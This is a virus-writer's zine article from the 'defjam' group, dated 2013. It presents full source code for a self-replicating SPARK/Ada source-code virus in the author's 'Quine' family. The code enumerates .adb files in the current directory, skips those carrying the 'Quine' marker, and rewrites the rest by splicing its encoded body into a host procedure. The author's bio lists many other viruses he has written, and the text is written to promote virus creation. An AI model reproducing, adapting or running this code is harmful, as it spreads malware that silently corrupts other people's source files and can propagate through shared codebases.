﻿                            Quine Viruses in Spark
                              roy g biv / defjam
 
                                 -= defjam =-
                                  since 1992
                     bringing you the viruses of tomorrow
                                    today!


About the author:

Former  DOS/Win16  virus writer, author of several virus  families,  including
Ginger  (see Coderz #1 zine for terrible buggy example, contact me for  better
sources  ;),  and Virus Bulletin 9/95 for a description of what   they  called
Rainbow.   Co-author  of  world's first virus using circular  partition  trick
(Orsam, coded with Prototype in 1993).  Designer of world's first XMS swapping
virus  (John Galt, coded by RT Fishel in 1995, only 30 bytes stub, the rest is
swapped  out).   Author of world's first virus using Thread Local Storage  for
replication  (Shrug, see Virus Bulletin 6/02 for a description, but they  call
it Chiton), world's first virus using Visual Basic 5/6 language extensions for
replication  (OU812), world's first Native executable virus (Chthon),  world's
first  virus  using process co-operation to prevent termination  (Gemini,  see
Virus  Bulletin 9/02 for a description), world's first virus using polymorphic
SMTP  headers (JunkMail, see Virus Bulletin 11/02 for a description),  world's
first viruses that can convert any data files to infectable objects (Pretext),
world's  first  32/64-bit  parasitic  EPO .NET  virus  (Croissant,  see  Virus
Bulletin  11/04  for a description, but they call it Impanate), world's  first
virus  using  self-executing HTML (JunkHTMaiL, see Virus Bulletin 7/03  for  a
description), world's first virus for Win64 on Intel Itanium (Shrug, see Virus
Bulletin 6/04 for a description, but they call it Rugrat), world's first virus
for  Win64 on AMD AMD64 (Shrug), world's first cross-infecting virus for Intel
IA32  and  AMD  AMD64  (Shrug),  world's  first  viruses  that  infect  Office
applications  and  script  files  using the same  code  (Macaroni,  see  Virus
Bulletin  11/05  for  a description, but they call it Macar),  world's   first
viruses  that  can infect both VBS and JScript using the same code (ACDC,  see
Virus  Bulletin 11/05 for a description, but they call it Cada), world's first
virus  that  can  infect  CHM files (Charm, see Virus  Bulletin  10/06  for  a
description,  but they call it Chamb), world's first IDA plugin virus  (Hidan,
see Virus Bulletin 3/07 for a description), world's first viruses that use the
Microsoft  Script  Encoder  to dynamically encrypt the  virus  body  (Screed),
world's  first virus for StarOffice and OpenOffice (Starbucks), world's  first
virus  IDC  virus (ID10TiC), world's first polymorphic virus for Win64 on  AMD
AMD64  (Boundary, see Virus Bulletin 12/06 for a description, but they call it
Bounds),  world's first virus that can infect Intel-format and  PowerPC-format
Mach-O  files  (MachoMan,  see  Virus Bulletin 1/07  for  a  description,  but
they  call  it  Macarena), world's first virus that uses  Unicode  escapes  to
dynamically  encrypt  the virus body (Unicycle), world's first  self-executing
PIF  (Spiffy), world's first self-executing LNK (WeakLNK), world's first virus
that uses virtual code (Relock, see Virus Bulletin 3/10 for a description, but
they  call  it  Lerock),  world's first virus to  use  FSAVE  for  instruction
reordering (Mimix, see Virus Bulletin 1/10 for a description, but they call it
Fooper), world's first virus for ODbgScript (Volly), world's first Hiew plugin
virus  (Hiewg),  world's first virus that uses fake BOMs (Bombastic),  world's
first  virus  that  uses JScript prototypes to run itself  (Protato),  world's
first  virus  that  uses  Heaven's Gate for  replication  (Heaven,  see  Virus
Bulletin  12/11  for a description, but they call it Sobelow),  world's  first
virus for 010 Editor script (To_Be, see Virus Bulletin 1/13 for a description,
but  they  call  it  Toobin),  world's first  truly  polymorphic  Batch  virus
(Polymer,  see Virus Bulletin 5/12 for a description, but they call it Lymer),
world's  first virusthat uses the GPU for decryption (OGLe, see Virus Bulletin
4/13  for  a description, but they call it Ogee), world's first virus  to  use
exception  handlers  to  construct the code, world's first virus  for  Haskell
(Haskhell),  world's  first virus for APL (Haply), world's first virus  for  D
source  code (Quine), world's first virus for Ada source code (Quine), world's
first  virus for Go source code (Quine), world's first virus for Algol  source
code  (Quine), world's first virus for Java source code (Quine), world's first
virus  for  Objective-C  source code (Quine), world's first  virus  for  Rust,
world's  first virus for Haskell source code (Quine), world's first virus  for
QBasic  source  code, world's  first virus for SmallBasic source code (Quine),
world's first virus for WinBatch source  code (Quine), world's first virus for
VHDL source code (Quine), and world's first virus for C++ source code (Quine).
Author  of  various retrovirus articles (eg see Vlad #7 for the  strings  that
make  your code invisible to TBScan).  This is my first virus for Spark source
code.   It is the world's first virus for Spark source code.  It continues the
Quine family.


What is it?

A  quine is a program which emits a copy of its own source code as its output.
We  can  make a variation of this technique to make a virus, which copies  its
own  source  code instead.  This is harder than printing itself.  The idea  is
source  code  infection,  well known for many years already, but we do  it  in
elegant form for the first time.  Here is the code:

with gnat.directory_operations,spark.ada.text_io,spark.ada.strings.unbounded,spark.ada.strings,spark.ada.strings.maps,spark.ada.strings.unbounded.not_spark,ada.strings.equal_case_insensitive;
use gnat.directory_operations,spark.ada.text_io,spark.ada.strings.unbounded,spark.ada.strings,spark.ada.strings.maps,spark.ada.strings.unbounded.not_spark;

procedure quine is
    a:string:="";                                                                          -- place atoi(code,16) here first, first "with" and "use" lines, then from "a:string" until "begin", and then from "open(b"
    b:dir_type;
    c,g:string(1..260);                                                                    -- MAX_PATH
    d,h,i,l,m:natural;
    e,j,k:unbounded_string;
    f:spark.ada.text_io.file_type;

    begin

        open(b,".");
        loop
            read(b,c,d);
            exit when d=0;
            if d>4 then
                if ada.strings.equal_case_insensitive(c(d-3..d),".adb")then                                     -- find all .adb files
                    e:=null_unbounded_string;
                    open(f,in_file,c(1..d),"");                                                                 -- open file
                    i:=0;
                    while not end_of_file_file(f)and i=0 loop                                                   -- loop until end of file
                        procedure_get_line_file(f,g,h);                                                         -- read file line by line
                        i:=index_pattern(string_to_unbounded_string(g(1..h)),"Quine",direction_forward,identity);
                                                                                                                -- watch for infection marker
                        append_string(e,g(1..h)&character'val(10));
                    end loop;
                    close(f);
                    if i=0 then                                                                                 -- if not infected
                        j:=e;
                        loop
                            h:=index_pattern(j,"end ",direction_forward,identity);                              -- find every "end " text
                            exit when h=0;                                                                      -- exit if none left
                            i:=index_pattern(function_unbounded_slice(j,h,get_length(j)),";",direction_forward,identity);
                                                                                                                -- find end of name
                            k:=function_unbounded_slice(j,h+4,h+i-2);                                           -- extract name
                            l:=index_pattern(e,"procedure "&to_string(k),direction_forward,identity);           -- find end of procedure
                            exit when l>0;                                                                      -- exit when found
                            j:=function_unbounded_slice(j,h+i,get_length(j));                                   -- continue search
                        end loop;
                        if h>0 then                                                                             -- if found end of procedure
                            j:=function_unbounded_slice(e,l,get_length(e));
                            h:=index_pattern(j,"begin",direction_forward,identity)-2;                           -- find begin in procedure
                            i:=index_pattern(j,to_string(concat_string_unbounded_string("end ",k)),direction_forward,identity)-2;
                                                                                                                -- find end in procedure
                            open(f,out_file,c(1..d),"");                                                        -- open file for writing
                            d:=1;
                            while d<a'length loop
                                m:=character'pos(a(d+1));
                                put_character_file(f,character'val(character'pos(a(d))*16+m-m/64*7-816));       -- place uses line or remaining variables or plaintext code, depending on index
                                d:=d+2;
                                if d=693 then
                                    put_file(f,to_string(function_unbounded_slice(e,1,l+h)));                   -- place host code until procedure begin
                                elsif d=715 then
                                    put_file(f,a);                                                              -- place atoi(code)
                                elsif d=921 then
                                    put_file(f,to_string(function_unbounded_slice(e,l+h,l+i)));                 -- place host code until procedure end
                                end if;
                            end loop;
                            put_file(f,to_string(function_unbounded_slice(e,l+i+1,get_length(e))));             -- write rest of host
                            close(f);
                        end if;
                    end if;
                end if;
            end if;
        end loop;
        close(b);
        exception when error:others=>return;
        --Quine - roy g biv 07/06/13

end quine;


Greets to friendly people (A-Z):

Active - Benny - herm1t - hh86 - jqwerty - Malum - Obleak - Prototype -
Ratter - Ronin - RT Fishel - sars - SPTH - The Gingerbread Man - Ultras -
uNdErX - Vallez - Vecna - Whitehead


rgb/defjam june 2013
iam_rgb@hotmail.com
